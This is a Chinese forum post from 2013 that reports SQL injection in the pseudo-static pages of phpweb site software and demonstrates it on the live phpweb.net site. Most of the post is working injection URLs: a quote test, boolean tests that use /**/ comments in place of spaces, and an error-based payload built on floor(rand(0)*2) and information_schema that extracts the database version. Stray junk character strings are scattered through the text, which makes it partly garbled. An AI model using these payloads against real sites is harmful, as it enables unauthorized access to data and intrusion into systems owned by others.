phpweb所有的整站程序伪静态页面都存在sql注入* M, p; s: z. `) a# G
6 a) V, q+ L9 u8 T, o
主站:http://phpweb.net/- }6 }, u. u1 B9 e
加’检测:" Z$ w" ]9 Q) c3 _2 f5 a
3 M6 W4 I- |, {" Z1 f( Y+ L/ z
http://www.phpweb.net/down/html/?772′.html
; u& G8 d% L0 e9 Z . _2 `* p5 n3 j, s+ j
出错$ Z0 G. d7 r+ J8 d1 [; C$ |$ w
存在注入。, o( M' M% |7 q m8 \( e
不能用空格,只能用/*罗5 B6 ]. r. u5 [ Z7 U2 @$ \0 ~
http://www.phpweb.net/page/html/?56′/**/and/**/1=1/*.html 正常
8 X" U) {, V% r# w5 {0 A
4 k: T$ [. o7 E# ^; B2 Phttp://www.phpweb.net/page/html/?56′/**/and/**/1=2/*.html 出错.# \6 N9 b9 g8 x V
爆数据库版本:
8 ?9 w; ^$ t: l& ^8 K1 T3 y4 p# h
0 W! a; y/ Y8 O$ a: p?9 G$ d \! D' ~
1, o: n& J* @' e' \7 m# B1 c
http://www.phpweb.net/page/html/?56'/**/and/**/(SELECT/**/1/**/from/**/(select/**/count(*),concat(floor(rand(0)*2),(substring((select(version())),1,62)))a/**/from/**/information_schema.tables/**/group/**/by/**/a)b)=1/*.html
3 B% k& w3 K( D3 k# A |更新日期: 2013-01-03 13:39:50 0 S* i1 W* K c g# `1 j
|
发表于 2013-1-4 19:46:42
收藏
支持
反对